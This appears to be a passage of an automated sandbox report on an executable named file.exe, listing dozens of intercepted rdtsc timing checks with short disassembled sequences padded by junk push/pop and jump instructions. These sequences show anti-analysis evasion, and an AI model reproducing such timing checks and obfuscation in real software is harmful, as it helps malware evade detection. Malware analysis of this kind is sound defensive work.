Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836274 second address: 183627E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC69D5338F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183627E second address: 1836282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836282 second address: 1836291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836291 second address: 1836297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836297 second address: 183629D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18372B4 second address: 18372C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18372C3 second address: 18372C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE40D second address: 17DE428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC69CFD56F2h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184311E second address: 1843122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843122 second address: 184312B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184312B second address: 1843131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843131 second address: 1843139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843139 second address: 184313F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843293 second address: 1843297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846DF7 second address: 1846E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC69D5338F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E0D second address: 1846E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC69CFD56E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E1D second address: 1846E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69D533909h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E40 second address: 1846E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E46 second address: 1846E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E4A second address: 1846E64 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC69CFD56E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FC69CFD56E8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184702E second address: 1847055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e je 00007FC69D533904h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DC6C second address: 184DC96 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC69CFD56E6h 0x00000009 pop ecx 0x0000000a push edx 0x0000000b jl 00007FC69CFD56E6h 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FC69CFD56EAh 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 jnl 00007FC69CFD56EAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184C90A second address: 184C910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184CF08 second address: 184CF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184CF0C second address: 184CF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69D5338FAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D069 second address: 184D06F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D06F second address: 184D08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69D533904h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D08C second address: 184D091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E1A3B second address: 17E1A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D527 second address: 184D569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F9h 0x00000007 je 00007FC69CFD56ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC69CFD56F7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D822 second address: 184D84E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69D5338FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC69D533908h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D84E second address: 184D854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D854 second address: 184D85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D970 second address: 184D9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 jns 00007FC69CFD56F5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC69CFD56F5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DAF4 second address: 184DAFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DAFA second address: 184DB10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FC69CFD56E6h 0x00000009 jg 00007FC69CFD56E6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DB10 second address: 184DB1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854453 second address: 1854479 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC69CFD56ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC69CFD56F0h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854479 second address: 185449C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b jp 00007FC69D5338F6h 0x00000011 jmp 00007FC69D533900h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18533AE second address: 18533B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18534F9 second address: 18534FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18534FE second address: 1853513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56EFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1853513 second address: 185351B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1853660 second address: 185366C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FC69CFD56E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185366C second address: 1853689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69D533909h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1803808 second address: 1803823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC69CFD56F0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1803823 second address: 1803836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D5338FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18542CB second address: 185430C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CFD56E8h 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FC69CFD5700h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC69CFD56ECh 0x00000018 js 00007FC69CFD56ECh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185430C second address: 1854314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854314 second address: 185431A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185763B second address: 1857641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185DADE second address: 185DAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185DAE2 second address: 185DAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185DAE8 second address: 185DAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C81A second address: 185C835 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC69D533901h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C835 second address: 185C839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C839 second address: 185C850 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC69D5338F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnl 00007FC69D5338F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C850 second address: 185C854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C854 second address: 185C86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69D5338FBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C86B second address: 185C86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C86F second address: 185C88B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533908h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C88B second address: 185C8A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185C8A9 second address: 185C8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185CA1A second address: 185CA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185CA20 second address: 185CA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185D325 second address: 185D32A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185D32A second address: 185D341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007FC69D5338FAh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185D7BB second address: 185D7D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F0h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185D7D0 second address: 185D7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007FC69D5338F6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC69D5338FAh 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1860E7D second address: 1860E8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186267C second address: 1862682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181B502 second address: 181B507 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181BEBE second address: 181BEC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181BEC4 second address: 181BEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181C227 second address: 181C22D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186605C second address: 18660A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC69CFD56F7h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FC69CFD56EAh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC69CFD56F6h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18660A9 second address: 18660AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18660AD second address: 18660B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CFD56E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18660B7 second address: 18660BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18660BD second address: 18660D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F0h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18660D3 second address: 18660D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18660D7 second address: 18660DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1866479 second address: 186647D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186B3C2 second address: 186B3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186B3C8 second address: 186B3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186B3CE second address: 186B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FC69CFD56F1h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186B3E6 second address: 186B3EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186B3EE second address: 186B3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186AC89 second address: 186AC93 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC69D5338F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186AE3B second address: 186AE45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CFD56E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186AFAE second address: 186AFB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186AFB7 second address: 186AFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186D83C second address: 186D842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186D3C2 second address: 186D3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186D3C6 second address: 186D3CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872AAC second address: 1872AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872AB2 second address: 1872AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872BEB second address: 1872BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872BF1 second address: 1872C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC69D5338F8h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872C01 second address: 1872C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56F5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC69CFD56EAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872C27 second address: 1872C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1872DBE second address: 1872DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18730E8 second address: 18730F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1873252 second address: 1873258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
